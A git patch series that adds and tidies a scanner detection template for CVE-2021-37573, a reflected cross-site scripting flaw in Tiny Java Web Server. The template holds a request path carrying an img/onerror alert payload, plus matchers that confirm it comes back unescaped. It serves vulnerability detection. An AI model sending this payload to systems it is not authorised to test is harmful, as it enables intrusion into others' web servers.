From 1ea3dfe3b7309b80f279fab41a1b9f21cf9970b3 Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 13 Aug 2021 17:14:13 -0500
Subject: [PATCH 1/4] Create CVE-2021-37573.yaml

---
 cves/2021/CVE-2021-37573.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 cves/2021/CVE-2021-37573.yaml

diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
new file mode 100644
index 0000000000..5474803cf9
--- /dev/null
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-37573
+
+info:   
+  name: Tiny Java Web Server Reflected XSS
+  reference:
+    - https://seclists.org/fulldisclosure/2021/Aug/13
+  author: geeknik
+  severity: medium
+  tags: cve,cve2021,xss,tjws
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 404
+      - type: word 
+        part: body
+        words:
+          - "<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"

From eed8e2e57330d35dce5b5cb25232ba1345d82bea Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 13 Aug 2021 17:17:18 -0500
Subject: [PATCH 2/4] Update CVE-2021-37573.yaml

---
 cves/2021/CVE-2021-37573.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 5474803cf9..6941c6cd68 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -1,6 +1,6 @@
 id: CVE-2021-37573
 
-info:   
+info:
   name: Tiny Java Web Server Reflected XSS
   reference:
     - https://seclists.org/fulldisclosure/2021/Aug/13

From 344fba3089f73121b44ab8c1023d6ed3a2f3897c Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 13 Aug 2021 17:17:35 -0500
Subject: [PATCH 3/4] Update CVE-2021-37573.yaml

---
 cves/2021/CVE-2021-37573.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 6941c6cd68..4419e9d6d0 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -18,7 +18,7 @@ requests:
       - type: status
         status:
           - 404
-      - type: word 
+      - type: word
         part: body
         words:
           - "<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"

From b5123f5abed89801b344ebcee3c95e7839128f46 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Sat, 14 Aug 2021 14:40:52 +0530
Subject: [PATCH 4/4] Update CVE-2021-37573.yaml

---
 cves/2021/CVE-2021-37573.yaml | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 4419e9d6d0..6c9c42fe15 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -1,11 +1,11 @@
 id: CVE-2021-37573
 
 info:
-  name: Tiny Java Web Server Reflected XSS
-  reference:
-    - https://seclists.org/fulldisclosure/2021/Aug/13
+  name: Tiny Java Web Server - Reflected XSS
   author: geeknik
   severity: medium
+  reference:
+    - https://seclists.org/fulldisclosure/2021/Aug/13
   tags: cve,cve2021,xss,tjws
 
 requests:
@@ -18,7 +18,13 @@ requests:
       - type: status
         status:
           - 404
+
       - type: word
         part: body
         words:
           - "<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"
+
+      - type: word
+        part: header
+        words:
+          - text/html